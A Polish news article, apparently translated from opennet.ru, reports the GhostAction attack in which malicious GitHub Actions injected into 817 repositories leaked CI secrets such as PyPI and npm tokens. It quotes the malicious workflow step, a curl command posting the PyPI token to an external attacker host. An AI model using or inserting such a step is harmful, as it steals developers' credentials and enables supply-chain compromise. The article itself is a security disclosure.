Podczas ataku GhostAction skompromitowano 817 repozytoriów na GitHubie

Badacze z firmy GitGuardian zidentyfikowali masowy atak na użytkowników GitHub, w wyniku którego uzyskano kontrolę nad 327 kontami i wstrzyknięto złośliwy handler Github Action do 817 repozytoriów. Atak doprowadził do wycieku 3325 sekretów, używanych w systemach ciągłej integracji i przesyłanych za pomocą zmiennych środowiskowych, w tym tokenów dostępu do PyPI, GitHub, NPM, DockerHub i różnych chmur obliczeniowych.

Podczas ataku GhostAction skompromitowano 817 repozytoriów na GitHubie

GitHub Actions umożliwia programistom przyczepianie handlerów do automatyzacji różnych operacji w GitHub. Na przykład za pomocą GitHub Actions można przeprowadzać określone kontrole i testy podczas dokonywania commitów lub automatyzować przetwarzanie nowych zgłoszeń. Złośliwy handler był rozpowszechniany pod nazwą „Github Actions Security” i zawierał w sekcji „run” polecenie „curl”, które wysyłało zawartość zmiennych środowiskowych na zewnętrzny host podczas uruchamiania zadań w środowisku ciągłej integracji. Złośliwy commit był dodawany z kont maintainerów projektów, które najprawdopodobniej zostały wcześniej zhakowane lub stały się ofiarą phishingu.

Atak został zidentyfikowany po analizie nietypowej aktywności związanej z pakietem FastUUID, który zapewnia Pythonowy interfejs do Rustowej biblioteki UUID. Pakiet FastUUID, który w ostatnim tygodniu odnotował prawie 1,2 miliona pobrań, jest używany jako zależność w popularnym projekcie LiteLLM, oferującym w PyPI ponad 5 milionów pobrań tygodniowo. Analiza zmian w repozytorium FastUUID wykazała, że 2 września maintainer projektu dodał commit z nowym handlerem Github Action, w którym znajdował się kod do wysyłania tokena do repozytorium PyPI na zewnętrzny host. — name: Github Actions Security run: | curl -s -X POST -d ‘PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}’ https://bold-dhawan.45-139-104-115.plesk.page

Problem udało się ustalić, zanim przestępcy wykorzystali przechwycony token — nie stwierdzono publikacji złośliwych zmian ani zmodyfikowanych wersji pakietu w PyPI dla FastUUID. Podobne podstawienia Github Action zidentyfikowano w 816 repozytoriach, a powiadomienia wysłano do ich właścicieli oraz administracji PyPI, GitHub, NPM i DockerHub. Na stan wczoraj wieczorem złośliwe commity zostały cofnięte w około 100 repozytoriach. Obecnie w wyszukiwarce GitHub wykrywanych jest 671 commitów ze złośliwym Github Action.

Źródło: opennet.ru

Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS 🔥 Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS | ProHoster